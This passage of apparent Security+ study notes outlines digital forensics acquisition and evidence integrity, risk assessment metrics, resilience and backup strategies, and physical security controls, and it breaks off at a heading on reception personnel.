● Ideally, the evidence must not be changed or manipulated. If a device used as
evidence must be manipulated to facilitate analysis (disabling the lock feature of
a mobile phone or preventing a remote wipe for example), the reasons for doing
so must be sound and the process of doing so must be recorded.

E-Discovery
● E-discovery is a means of filtering the relevant evidence produced from all the
data gathered by a forensic examination and storing it in a database in a format
such that it can be used as evidence in a trial.
● Some of the functions of e-discovery suites are:
 ○ Identify and deduplicate files and metadata—many files on a computer
system are "standard" installed files or copies of the same file.
■ E-discovery filters these types of files, reducing the volume of data
that must be analyzed.
○ Search—allow investigators to locate files of interest to the case.
■ As well as keyword search, software might support semantic
search.
○ Tags—apply standardized keywords or labels to files and metadata to
help organize the evidence.
■ Tags might be used to indicate relevancy to the case or part of the
case or to show confidentiality, for instance.
○ Security—at all points evidence must be shown to have been stored,
transmitted, and analyzed without tampering.
○ Disclosure—an important part of trial procedure is that the same evidence
be made available to both plaintiff and defendant.
■ Recent court cases have required parties to a court case to provide
searchable ESI rather than paper records.

Timelines
● Operating systems and file systems use a variety of methods to identify the time
at which something occurred.
● The benchmark time is Coordinated Universal Time (UTC), which is essentially
the time at the Greenwich meridian.
● Time Offset: In forensics, identifying whether a time zone offset has been applied
to a file's time stamp.

Event Logs and Network Traffic

● An investigation may also obtain the event logs for one or more network
appliances and/or server hosts.
 ● A Retrospective Network Analysis (RNA) solution provides the means to record
network events at either a packet header or payload level.

Strategic Intelligence and Counterintelligence

● Digital forensics can be used for information gathering to protect against
espionage and hacking.
● This intelligence is deployed in two different ways:
○ Counterintelligence—identification and analysis of specific adversary
tactics, techniques, and procedures (TTP) provides information about how
to configure and audit active logging systems so that they are most likely
to capture evidence of attempted and successful intrusions.
○ Strategic intelligence—data and research that has been analyzed to
produce actionable insights.
■ These insights are used to inform risk management and security
control provisioning to build mature cybersecurity capabilities.

Data Acquisition and Order of Volatility

● Acquisition is the process of obtaining a forensically clean copy of data from a
device held as evidence.
● If the computer system or device is not owned by the organization, there is the
question of whether search or seizure is legally valid.
○ This impacts bring-your-own-device (BYOD) policies.
● Data acquisition is also complicated by the fact that it is more difficult to capture
evidence from a digital crime scene than it is from a physical one.
○ An image can be acquired from either volatile or nonvolatile storage.
○ The general principle is to capture evidence in the order of volatility,
from more volatile to less volatile.
● The ISOC best practice guide to evidence collection and archiving:
○ 1. CPU registers and cache memory (including cache on disk controllers,
GPUs, and so on).
 ○ 2. Contents of nonpersistent system memory (RAM), including routing
table, ARP cache, process table, kernel statistics.
○ 3. Data on persistent mass storage devices (HDDs, SSDs, and flash
memory devices):
○ 4. Remote logging and monitoring data.
○ 5. Physical configuration and network topology.
○ 6. Archival media and printed documents.

Digital Forensics Software

● Most of the commercial forensics tools are available for the Windows platform
only.
● EnCase Forensic is a digital forensics case management product created by
Guidance Software.
○ Case management is assisted by built-in pathways, or workflow templates,
showing the key steps in diverse types of investigation.
● The Forensic Toolkit (FTK): A commercial digital forensics investigation
management and utilities suite, published by AccessData.
● The Sleuth Kit: an open-source collection of command line tools and
programming libraries for disk imaging and file analysis
○ Autopsy is a graphical front-end for these tools and acts as a case
management/workflow tool.
● X-Ways Forensics (x-ways.net/forensics/) is a commercial tool for forensic
recovery and analysis of binary data, with support for a range of file systems and
memory dump types (depending on version).
● The Volatility Framework (github.com/volatilityfoundation/volatility) is widely used
for system memory analysis.

System Memory Acquisition

 ● A system memory dump creates an image file that can be analyzed to identify
the processes that are running, the contents of temporary file systems, registry
data, network connections, cryptographic keys, and more.
● Live Acquisition:
○ A specialist hardware or software tool can capture the contents of memory
while the host is running.
○ Unfortunately, this type of tool needs to be preinstalled as it requires a
kernel mode driver to dump any data of interest.
● Crash Dump:
○ When Windows encounters an unrecoverable kernel error, it can write
contents of memory to a dump file at C:\Windows\MEMORY.DMP.
● Hibernation File and Pagefile:
○ A hibernation file is created on disk in the root folder of the boot volume
when a Windows host is put into a sleep state.
○ If it can be recovered, the data can be decompressed and loaded into a
software tool for analysis.
○ The pagefile/swap file/swap partition stores pages of memory in use that
exceed the capacity of the host's RAM modules.
■ The pagefile is not structured in a way that analysis tools can
interpret, but it is possible to search for strings.

Disk Image Acquisition

● Disk image acquisition refers to acquiring data from nonvolatile storage.
● This can also be referred to as device acquisition, meaning the SSD storage in a
smartphone or media player.
● There are three device states for persistent storage acquisition:
○ Live acquisition—this means copying the data while the host is still
running.
■ This may capture more evidence or more data for analysis and
reduce the impact on overall services, but the data on the actual
 disks will have changed, so this method may not produce legally
acceptable evidence.
○ Static acquisition by shutting down the host—this runs the risk that the
malware will detect the shutdown process and perform anti-forensics to try
to remove traces of itself.
○ Static acquisition by pulling the plug—this means disconnecting the power
at the wall socket (not the hardware power-off button).
■ This is most likely to preserve the storage devices in a forensically
clean state, but there is the risk of corrupting data.
● DD Command: Linux command that makes a bit-by-bit copy of an input file,
typically used for disk imaging.

Preservation and Integrity of Evidence

● It is vital that the evidence collected at the crime scene conform to a valid
timeline.
● Digital information is susceptible to tampering, so access to the evidence must
be tightly controlled.
● Recording the whole process establishes the provenance of the evidence as
deriving directly from the crime scene.
● Write Blocker: Forensic tool to prevent the capture or analysis device or
workstation from changing data on a target disk or media.
● Data Acquisition with Integrity and Non-Repudiation:
○ Once the target disk has been safely attached to the forensics
workstation, data acquisition proceeds as follows:
■ 1. A cryptographic hash of the disk media is made, using either the
MD5 or SHA hashing function. The output of the function can be
described as a checksum.
■ 2. A bit-by-bit copy of the media is made using the imaging utility.
■ 3. A second hash is then made of the image, which should match
the original hash of the media.
 ■ 4. A copy is made of the reference image, validated again by the
checksum. Analysis is performed on the copy.

Acquisition of Other Data

● Network:
○ Packet captures and traffic flows can contain very valuable evidence, if the
capture was running at the right time and in the right place to record the
incident.
● Cache:
○ Software-based cache is stored in the file system and can be acquired as
part of a disk image.
■ For example, each browser has a cache of temporary files, and
each user profile has a cache of temp files.
● Artifacts and Data Recovery:
○ Artifacts refers to any type of data that is not part of the mainstream data
structures of an operating system.
○ For example, the Windows Alternate Data Streams (ADS) feature is
often used to conceal file data, and various caches, such as prefetch and
Amcache, can be used to find indicators of suspicious process behavior.
○ Carving: The process of extracting data from a computer when that data
has no associated file system metadata.
● Snapshot:
○ A snapshot is a live acquisition image of a persistent disk.
● Firmware:
○ Firmware is usually implemented as flash memory. Some types, such as
the PC firmware, can potentially be extracted from the device or from
system memory using an imaging utility.

Digital Forensics for Cloud

 ● While companies can operate private clouds, forensics in a public cloud are
complicated by the right to audit permitted to you by your service level agreement
(SLA) with the cloud provider.
● Other issues with forensics investigations of cloud-hosted processing and data
services are as follows:
○ The on-demand nature of cloud services means that instances are often
created and destroyed again, with no real opportunity for forensic recovery
of any data.
○ Chain of custody issues are complex and might have to rely on the CSP to
select and package data for you.
○ Jurisdiction and data sovereignty may restrict what evidence the CSP is
willing to release to you.
○ If the CSP is a data processor, it will be bound by data breach notification
laws and regulations.

Lesson 19: Summarizing Risk Management Concepts

Risk Management Processes

● Risk management is a process for identifying, assessing, and mitigating
vulnerabilities and threats to the essential functions that a business must perform
to serve its customers.
● You can think of this process as being performed over five phases:
○ 1. Identify mission-essential functions—mitigating risk can involve a large
amount of expenditure so it is important to focus efforts.
○ 2. Identify vulnerabilities—for each function or workflow (starting with the
most critical), analyze systems and assets to discover and list any
vulnerabilities or weaknesses to which they may be susceptible.
○ 3. Identify threats—for each function or workflow, identify the threat
sources and actors that may take advantage of or exploit or accidentally
trigger vulnerabilities.
 ○ 4. Analyze business impacts—the likelihood of a vulnerability being
activated as a security incident by a threat and the impact of that incident
on critical systems are the factors used to assess risk.
○ 5. Identify risk response—for each risk, identify possible countermeasures
and assess the cost of deploying additional security controls.
● Likelihood of occurrence is the probability of the threat being realized.
● Impact is the severity of the risk if realized as a security incident
● Enterprise Risk Management (ERM): The comprehensive process of evaluating,
measuring, and mitigating the many risks that pervade an organization.

Risk Types
● External:
○ You must also consider wider threats than those of cyberattack.
○ Natural disasters, such as the COVID-19 pandemic, illustrate the need to
have IT systems and workflows that are resilient to widespread
dislocation.
● Internal:
○ When reviewing internal risks, it is important to remember that these can
be classed as malicious or accidental (non-malicious).
○ Internal threats can include contractors who were granted temporary
access.
● Multiparty:
○ Multiparty risk is where an adverse event impacts multiple organizations.
○ Multiparty risk usually arises from supplier relationships.
● Intellectual Property (IP) Theft:
○ If IP data is exfiltrated it will lose much of its commercial value.
○ Losses can be very difficult to recover in territories where there are not
strong legal protections.

Quantitative Risk Assessment

● Quantitative risk assessment aims to assign concrete values to each risk factor.
 ● Single Loss Expectancy (SLE)—the amount that would be lost in a single
occurrence of the risk factor.
○ This is determined by multiplying the value of the asset by an Exposure
Factor (EF).
■ In risk calculation, the percentage of an asset's value that would be
lost during a security incident or disaster scenario.
● Annualized Loss Expectancy (ALE)—the amount that would be lost over the
course of a year.
○ This is determined by multiplying the SLE by the Annualized Rate of
Occurrence (ARO).
■ In risk calculation, an expression of the probability/likelihood of a
risk as the number of times per year a particular loss is expected to
occur.

Qualitative Risk Assessment

● Qualitative risk assessment avoids the complexity of the quantitative approach
and is focused on identifying significant risk factors.
● The qualitative approach seeks out people's opinions of which risk factors are
significant.
● Assets could be categorized as Irreplaceable, High Value, Medium Value, and
Low Value; risks could be categorized as one-off or recurring and as Critical,
High, Medium, and Low probability.

Risk Management Strategies

● The result of a quantitative or qualitative analysis is a measure of inherent risk
● Inherent risk is the level of risk before any type of mitigation has been
attempted.
● It is not possible to eliminate risk; rather the aim is to mitigate risk factors to the
point where the organization is exposed only to a level of risk that it can afford.
● The overall status of risk management is referred to as risk posture.
○ The overall status of risk management is referred to as risk posture.
 ● Risk mitigation (or remediation) is the overall process of reducing exposure to
or the effects of risk factors.
● If you deploy a countermeasure that reduces exposure to a threat or vulnerability
that is risk deterrence (or reduction).
○ Risk reduction refers to controls that can either make a risk incident less
likely or less costly (or perhaps both).

Risk Avoidance and Risk Transference

● Avoidance means that you stop doing the activity that is risk-bearing.
● Transference (or sharing) means assigning risk to a third party, such as an
insurance company or a contract with a supplier that defines liabilities.

Risk Acceptance and Risk Appetite

● Risk Acceptance:
○ Risk acceptance (or tolerance) means that no countermeasures are put
in place either because the level of risk does not justify the cost or
because there will be unavoidable delay before the countermeasures are
deployed.
● Residual Risk and Risk Appetite:
○ Residual Risk: Risk that remains even after controls are put into place.
○ Risk appetite is a strategic assessment of what level of residual risk is
tolerable.
● Control Risk:
○ Control risk is a measure of how much less effective a security control
has become over time.
○ For example, antivirus became quite capable of detecting malware on the
basis of signatures, but then less effective as threat actors started to
obfuscate code.

Risk Awareness
 ● To ensure that the business stakeholders understand each risk scenario, you
should articulate it such that the cause and effect can clearly be understood by
the owner of the asset.
● A risk register is a document showing the results of risk assessments in a
comprehensible format.
● The register may resemble the heat map risk matrix shown earlier with columns
for impact and likelihood ratings, date of identification, description,
countermeasures, owner/route for escalation, and status.

Business Impact Analysis

● Business impact analysis (BIA) is the process of assessing what losses might
occur for a range of threat scenarios.
● Where BIA identifies risks, business continuity planning (BCP) identifies controls
and processes that enable an organization to maintain critical workflows in the
face of some adverse event.

Mission Essential Functions

● A business or organizational activity that is too critical to be deferred for anything
more than a few hours, if at all.
● Maximum tolerable downtime (MTD) is the longest period of time that a
business function outage may occur for without causing irrecoverable business
failure.
● Recovery time objective (RTO) is the period following a disaster that an
individual IT system may remain offline.
○ This represents the amount of time it takes to identify that there is a
problem and then perform recovery.
● Work Recovery Time (WRT). Following systems recovery, there may be
additional work to reintegrate different systems, test overall functionality, and
brief system users on any changes or different working practices so that the
business function is again fully supported.
Identification of Critical Systems
● To support the resiliency of mission essential and primary business functions, it
is crucial to perform an identification of critical systems.
● This means compiling an inventory of business processes and the assets that
support them.
● Asset Types include:

Single Points of Failure

● Single Point of Failure (SPoF): A component or system that would cause a
complete interruption of a service if it failed.
○ A SPoF is an asset that causes the entire workflow to fail if it is damaged
or otherwise not available.
● Mean Time Between Failures (MTBF): Metric for a device or component that
predicts the expected time between failures.
○ The calculation for MTBF is the total operational time divided by the
number of failures.
○ For example, if you have 10 appliances that run for 50 hours and two of
them fail, the MTBF is 250 hours/failure (10*50)/2.
● Mean Time to Failure (MTTF): Metric indicating average time a device or
component is expected to be in operation.
● MTTF/MTBF: used to determine the amount of asset redundancy a system
should have.
○ A redundant system can failover to another asset if there is a fault and
continue to operate normally. It can also be used to work out how likely
failures are to occur.
● Mean Time to Repair (MTTR) is a measure of the time taken to correct a fault so
that the system is restored to full operation.

Disasters
● State Risk Assessment:
○ A site risk assessment evaluates exposure to the following types of factor:
 ■ Risk from disaster events, such as earthquake, flood, and fire.
These events can occur naturally or from person-made causes.
■ Risk from disruption to utilities, such as electricity, water, and
transportation. These risks are higher in geographically isolated
sites.
■ Risk to health and safety from on-premises electromechanical
systems or chemicals.

Disaster Recovery Plans

● A documented and resourced plan showing actions and responsibilities to be
used in response to critical incidents.
● The DRP should accomplish the following:
○ 1. Identify scenarios for natural and non-natural disaster and options for
protecting systems.
○ 2. Identify tasks, resources, and responsibilities for responding to a
disaster.
○ 3. Train staff in the disaster planning procedures and how to react well to
change.

Functional Recovery Plans

● Because disasters are extreme and (hopefully) rare events, it is very difficult to
evaluate how effective or functional a recovery plan is.
● There are four principal methods for assessing the functionality of recovery
plans:
○ Walk-throughs, workshops, and orientation seminars—often used to
provide basic awareness and training for disaster recovery team
members, these exercises describe the contents of DRPs, and other
plans, and the roles and responsibilities outlined in those plans.
○ Tabletop exercises—staff "ghost" the same procedures as they would in a
disaster, without actually creating disaster conditions or applying or
changing anything.
 ○ Functional exercises—action-based sessions where employees can
validate DRPs by performing scenario-based activities in a simulated
environment.
○ Full-scale exercises— action-based sessions that reflect real situations,
these exercises are held onsite and use real equipment and real
personnel as much as possible.

Lesson 20: Implementing Cybersecurity Resilience

High Availability
● The property that defines how closely systems approach the goal of providing
data availability 100 percent of the time while maintaining a high level of system
performance.
● Scalability and Elasticity:
○ Scalability is the capacity to increase resources to meet demand within
similar cost ratios.
■ This means that if service demand doubles, costs do not more than
double.
■ There are two types of scalability:
● To scale out is to add more resources in parallel with
existing resources.
● To scale up is to increase the power of existing resources.
● Fault Tolerance and Redundancy:
○ A system that can experience failures and continue to provide the same
(or nearly the same) level of service is said to be fault tolerant.
○ Fault tolerance is often achieved by provisioning redundancy for critical
components and single points of failure.
■ A redundant component is one that is not essential to the normal
function of a system but that allows the system to recover from the
failure of another component.
Power Redundancy
● Dual Power Supplies:
○ An enterprise-class server or appliance enclosure is likely to feature two or
more power supply units (PSUs) for redundancy.
● Managed Power Distribution Units (PDUs):
○ Advanced strip socket that provides filtered output voltage. A managed
unit supports remote administration.
○ These come with circuitry to "clean" the power signal, provide protection
against spikes, surges, and brownouts, and can integrate with
uninterruptible power supplies (UPSs).
● Battery Backups and Uninterruptible Power Supplies (UPSs):
○ A battery-powered device that supplies AC power that an electronic device
can use in the event of power failure.
● Generators:
○ A backup power generator can provide power to the whole building,
often for several days.

Network Redundancy
● Network Interface Card (NIC) Teaming:
○ Network interface card (NIC) teaming, or adapter teaming, means that the
server is installed with multiple NICs, or NICs with multiple ports, or both.
○ If there is a problem with one cable, or one NIC, the network connection
will continue to work, though at just 3 Gb.
● Switching and Routing:
○ Network cabling should be designed to allow for multiple paths between
the various switches and routers, so that during a failure of one part of the
network, the rest remains operational.
● Load Balancers:
○ NIC teaming provides load balancing at the adapter level. Load balancing
and clustering can also be provisioned at a service level:
 ■ A load balancing switch distributes workloads between available
servers.
■ A load balancing cluster enables multiple redundant servers to
share data and session information to maintain a consistent service
if there is failover from one server to another.

Disk Redundancy
● Disk redundancy ensures that a server can continue to operate if one, or possibly
more, storage devices fail.
● Redundant Array of Independent Disks (RAID):
○ Specifications that support redundancy and fault tolerance for different
configurations of multiple-device storage systems.
● Multipath:
○ Overprovisioning controllers and cabling so that a host has failover
connections to storage media.

Geographical Redundancy and Replication

● Data replication is technology that maintains exact copies of data at more than
one location.
● RAID mirroring and parity implements types of replication between local storage
devices.
● Data replication can be applied in many other contexts:
○ Storage Area Network (SAN)—most enterprise storage is configured as a
SAN.
■ A SAN is a high-speed fiber optic network of storage devices built
from technologies such as Fibre Channel, Small Computer System
Interface (SCSI), or Infiniband.
○ Database—much data is stored within a database. Where a database is
replicated between multiple servers or sites, it is very important to
maintain consistency between the replicas.
 ○ Virtual Machine (VM)—the same VM instance may need to be deployed in
multiple locations. This can be achieved by replicating the VM's disk
image and configuration settings.
● Geographical Dispersal:
○ Geographical dispersal refers to data replicating hot and warm sites that
are physically distant from one another.
○ This means that data is protected against a natural disaster wiping out
storage at one of the sites.
● Asynchronous and Synchronous Replication:
○ Synchronous replication is designed to write data to all replicas
simultaneously.
■ Therefore, all replicas should always have the same data all of the
time.
○ Asynchronous replication writes data to the primary storage first, and then
copies data to the replicas at scheduled intervals.

Backups and Retention Policy

● Data retention needs to be considered in the short and long term:
○ In the short term, files that change frequently might need retaining for
version control.
■ Short-term retention is also important in recovering from malware
infection.
○ In the long term, data may need to be stored to meet legal requirements or
to comply with company policies or industry standards.

Backup Types
● When considering a backup made against an original copy of data, the backup
can usually be performed using one of three main types: full, incremental, and
differential.
 ● In Windows, a full backup includes all selected files and directories while
incremental and differential backups check the status of the archive attribute
before including a file. The archive attribute is set whenever a file is modified.
● Incremental Backup:
○ A backup type in which all selected files that have changed since the last
full or incremental backup (whichever was most recent) are backed up.
● Differential Backup:
○ A backup type in which all selected files that have changed since the last
full backup are backed up.
● Copy Backups:
○ Most software also has the capability to do copy backups. These are
made outside the media rotation system and do not affect the archive
attribute.

Snapshot and Images

● A snapshot is a point-in-time copy of data maintained by the file system.
● In Windows, snapshots are provided for on NTFS volumes by the Volume
Shadow Copy Service (VSS).
○ Makes snapshot backups of files even if they are open. It is used for
Windows backup and the System Restore and Previous Versions
features.
● Images:
○ An image backup is made by duplicating an OS installation.
○ A duplicate of an operating system installation (including installed
software, settings, and any user data) stored on removable media.

Backup Storage Issues

● Offsite Storage:
○ Distance consideration is a calculation of how far offsite the backup needs
to be kept, given different disaster scenarios.
 ○ On the one hand, the media must be kept far away enough not to be
damaged by the disaster; on the other, media access should not slow
down a recovery operation too much.
● Online versus Offline Backups:
○ An online backup system is instantly available to perform a backup or
restore operation without an administrator having to transport and connect
a device or load some backup media.
○ An offline backup is disconnected from the host and must be connected
manually.
○ An online system is faster, but an offline backup offers better security.
Consider the case of crypto ransomware, for instance.

Backup Media Types

● Disk:
○ Individual removable hard drives are an excellent low-cost option for small
office/home office (SOHO) network backups, but they do not have
sufficient capacity or flexibility to be used within an automated enterprise
backup solution.
● Network Attached Storage (NAS):
○ A storage device with an embedded OS that supports typical network file
access protocols (TCP/IP and SMB for instance).
○ A NAS appliance is accessed via an IP address and backup takes place at
file-level.
● Tape:
○ Digital tape systems are a popular choice for institutions with multi-
terabyte storage requirements.
○ Tape media provides robust, high-capacity backup storage. Tape drives
and autoloader libraries can be connected to the SATA and SAS buses or
accessed via a SAN.
○ The main drawback of tape is that it is slow, compared to disk-based
solutions, especially for restore operations.
 ● Storage Area Network (SAN) and Cloud:
○ A RAID array or tape drive/autoloader can be provisioned as direct
attached storage, where a server hosts the backup devices, usually over
serial attached SCSI (SAS).
○ Storage Area Networks (SAN): A network dedicated to data storage,
typically consisting of storage devices and servers connected to switches
via host bus adapters.

Restoration Order
● A concept that dictates the sequence in which systems must be brought back
online during disaster recovery.
● In very general terms, the order of restoration will be as follows:
○ Enable and test power delivery systems (grid power, power distribution
units [PDUs], UPS, secondary generators, and so on).
○ Enable and test switch infrastructure, then routing appliances and
systems.
○ Enable and test network security appliances (firewalls, IDS, proxies).
○ Enable and test critical network servers (DHCP, DNS, NTP, and directory
services).
○ Enable and test back-end and middleware (databases and business
logic). Verify data integrity.
○ Enable and test front-end applications.
○ Enable client workstations and devices and client browser access.

Non Persistence
● 1. **Nonpersistence**: This refers to a setup where changes made to a
computing environment, like a virtual machine, are not permanent. Instead, the
system is restored to a known state, ensuring that any malware or backdoors are
removed when the environment is recreated.
● 2. **Mechanisms for Nonpersistence**:
 ● - **Snapshot/Revert**: Saving a system state that can be applied later to reset
the instance.
● - **Rollback**: Restoring the baseline system configuration, similar to Windows
System Restore.
● - **Live Boot Media**: Booting from read-only storage to memory, avoiding
changes to the local disk.
● 3. **Mastering Instructions**:
● - **Master Image**: A complete, pre-configured server instance known as the
"gold" copy.
● - **Automated Build from Template**: Instructions for building and provisioning
an instance rather than storing a complete copy.
● 4. **Configuration Validation**: Ensuring that a recovery solution is functioning
properly across various layers (hardware, network, data, and application) by
monitoring key indicators like recovery time and data replication.

Configuration Management
● Configuration management ensures that each component of ICT infrastructure
is in a trusted state that has not diverged from its documented properties.
● Change control and change management reduce the risk that changes to
these components could cause service disruption.

Asset Management
● An asset management process tracks all the organization's critical systems,
components, devices, and other objects of value in an inventory.
● It also involves collecting and analyzing information about these assets so that
personnel can make more informed changes or otherwise work with assets to
achieve business goals.
● Asset Identification and Standard Naming Conventions:
○ Tangible assets can be identified using a barcode label or radio frequency
ID (RFID) tag attached to the device (or more simply, using an
identification number).
 ○ An RFID tag is a chip programmed with asset data.
■ When in range of a scanner, the chip activates and signals the
scanner.
■ The scanner alerts management software to update the device's
location. As well as asset tracking, this allows the management
software to track the location of the device, making theft more
difficult.
○ A standard naming convention for hardware assets, and for digital
assets such as accounts and virtual machines, makes the environment
more consistent.
■ Applying consistent names and labels to assets and digital
resources/identities within a configuration management system.
● Internet Protocol (IP) Schema:
○ The division of the IP address space into subnets should be carefully
planned and documented in an Internet Protocol (IP) schema.
○ IP Address Management (IPAM): Software consolidating management of
multiple DHCP and DNS services to provide oversight into IP address
allocation across an enterprise network

Change Control and Change Management

● Service management standards distinguish change control as distinct procedures
for requesting and approving changes within an overall change management
process.
● Change Control:
○ A change control process can be used to request and approve changes in
a planned and controlled way.
○ Change requests are usually generated when something needs to be
corrected, when something changes, or when there is room for
improvement in a process or system currently in place.
 ○ The need to change is often described either as reactive, where the
change is forced on the organization, or as proactive, where the need for
change is initiated internally.
● Change Management:
○ The implementation of changes should be carefully planned, with
consideration for how the change will affect dependent components.
○ For most significant or major changes, organizations should attempt to
trial the change first.

Site Resiliency
● Site resiliency is described as hot, warm, or cold.
● A hot site can failover almost immediately.
○ It generally means that the site is already within the organization's
ownership and is ready to deploy.
○ For example, a hot site could consist of a building with operational
computer equipment that is kept updated with a live data set.
● A warm site could be similar, but with the requirement that the latest data set will
need to be loaded.
○ A location that is dormant or performs noncritical functions under normal
conditions, but which can be rapidly converted to a key operations site if
needed.
● A cold site takes longer to set up. A cold site may be an empty building with a
lease agreement in place to install whatever equipment is required when
necessary.

Diversity and Defense in Depth

● Layered security is typically seen as improving cybersecurity resiliency because
it provides defense in depth.
○ These layers reduce the potential attack surface and make it much more
likely that an attack will be deterred or prevented, or at least detected and
then prevented by manual intervention.
 ● Technology and Control Diversity:
○ Diversity: Cybersecurity resilience strategy that increases attack costs by
provisioning multiple types of controls, technologies, vendors, and crypto
implementations.
○ Technology diversity refers to environments that are a mix of operating
systems, applications, coding languages, virtualization solutions, and so
on.
○ Control diversity means that the layers of controls should combine
different classes of technical and administrative controls with the range of
control functions: prevent, detect, correct, and deter.
● Vendor Diversity:
○ Vendor diversity means that security controls are sourced from multiple
suppliers.
● Crypto Diversity:
○ This concept can be extended to the selection of algorithms and
implementations of cryptography.

Deception and Disruption Strategies

● Active defense means an engagement with the adversary, but this can be
interpreted in several different ways.
● Honeypots, Honeynets, and Honey Files:
○ A honeynet is an entire decoy network. This may be set up as an actual
network or simulated using an emulator.
○ On a production network, a honeypot is more likely to be located in a
DMZ, or on an isolated segment on the private network (if the honeypot is
seeking to draw out insider threats).
○ A honeypot or honeynet can be combined with the concept of a honeyfile,
which is convincingly useful, but actually fake, data.
■ This honeyfile can be made trackable, so that when a threat actor
successfully exfiltrates it, the attempts to reuse or exploit it can be
traced.
 ● Disruption Strategies:
○ These adopt some of the obfuscation strategies used by malicious actors.
○ The aim is to raise the attack cost and tie up the adversary's resources.
Some examples of disruption strategies include:
■ Using bogus DNS entries to list multiple hosts that do not exist.
■ Configuring a web server with multiple decoy directories or
dynamically generated pages to slow down scanning.
■ Using port triggering or spoofing to return fake telemetry data
when a host detects port scanning activity.
● This will result in multiple ports being falsely reported as
open and will slow down the scan.
■ Using a DNS sinkhole to route suspect traffic to a different
network, such as a honeynet, where it can be analyzed.

Lesson 21: Explaining Physical Security

Physical Security Controls

● Physical access controls are security measures that restrict and monitor
access to specific physical areas or assets.
● Physical access controls depend on the same access control fundamentals as
network or operating system security:
○ Authentication—create access lists and identification mechanisms to allow
approved persons through the barriers.
○ Authorization—create barriers around a resource so that access can be
controlled through defined entry and exit points.
○ Accounting—keep a record of when entry/exit points are used and detect
security breaches.

Site Layout, Fencing, and Lighting

● Try to plan the site using the following principles:
 ○ Locate secure zones, such as equipment rooms, as deep within the
building as possible, avoiding external walls, doors, and windows.
○ Use a demilitarized zone (DMZ) design for the physical space.
■ Position public access areas so that guests do not pass near
secure zones.
○ Use signage and warnings to enforce the idea that security is tightly
controlled.
○ Conversely, entry points to secure zones should be discreet.
■ Use industrial camouflage to make buildings and gateways
protecting high-value assets unobtrusive, or create high-visibility
decoy areas to draw out potential threat actors.
○ Try to minimize traffic having to pass between zones. The flow of people
should be "in and out" rather than "across and between."
○ Give high-traffic public areas high visibility, so that covert use of gateways,
network access ports, and computer equipment is hindered, and
surveillance is simplified.
○ In secure zones, do not position display screens or input devices facing
toward pathways or windows. Alternatively, use one-way glass so that no
one can look in through windows.
● Barricades and Entry/Exit Points:
○ A barricade is something that prevents access. As with any security
system, no barricade is completely effective.
● Fencing:
○ The exterior of a building may be protected by fencing.
● Lighting:
○ Security lighting is enormously important in contributing to the perception
that a building is safe and secure at night.

Gateways and Locks

 ● Physical—a conventional lock prevents the door handle from being operated
without the use of a key. More expensive types offer greater resistance against
lock picking.
● Electronic—rather than a key, the lock is operated by entering a PIN on an
electronic keypad. This type of lock is also referred to as cipher, combination, or
keyless.
○ A smart lock may be opened using a magnetic swipe card or feature a
proximity reader to detect the presence of a physical token, such as a
wireless key fob or smart card.
● Mantraps:
○ This risk may be mitigated by installing a turnstile (a type of gateway that
only allows one person through at a time).
○ A mantrap is where one gateway leads to an enclosed space protected
by another barrier.
● Cable Locks:
○ Devices can be physically secured against theft using cable ties and
padlocks.

Physical Attacks Against Smart Cards and USB

● Some types of smart cards used as passkeys for electronic locks can be
vulnerable to cloning and skimming attacks:
○ Card cloning—this refers to making one or more copies of an existing
card.
■ A lost or stolen card with no cryptographic protections can be
physically duplicated.
○ Skimming—this refers to using a counterfeit card reader to capture card
details, which are then used to program a duplicate.
■ Some types of proximity cards can quite easily be made to transmit
the credential to a portable RFID reader that a threat actor could
conceal on his or her person.
● Malicious USB charging cables and plugs are also a widespread problem.
 ○ A USB data blocker can provide mitigation against these juice-jacking
attacks by preventing any sort of data transfer when the smartphone or
laptop is connected to a charge point.

Alarm Systems and Sensors

● There are five main types of alarm:
○ Circuit—a circuit-based alarm sounds when the circuit is opened or
closed, depending on the type of alarm.
■ This could be caused by a door or window opening or by a fence
being cut.
○ Motion detection—a motion-based alarm is linked to a detector triggered
by any movement within an area (defined by the sensitivity and range of
the detector), such as a room
○ Noise detection—an alarm triggered by sounds picked up by a
microphone.
○ Proximity—radio frequency ID (RFID) tags and readers can be used to
track the movement of tagged objects within an area.
○ Duress—this type of alarm is triggered manually by staff if they come
under threat.

Security Guards and Cameras

● Surveillance is typically a second layer of security designed to improve the
resilience of perimeter gateways.
● CCTV (Closed Circuit Television): Installation of video cameras to supply security
monitoring data to a centralized management station.

Reception Personnel and ID Badges

●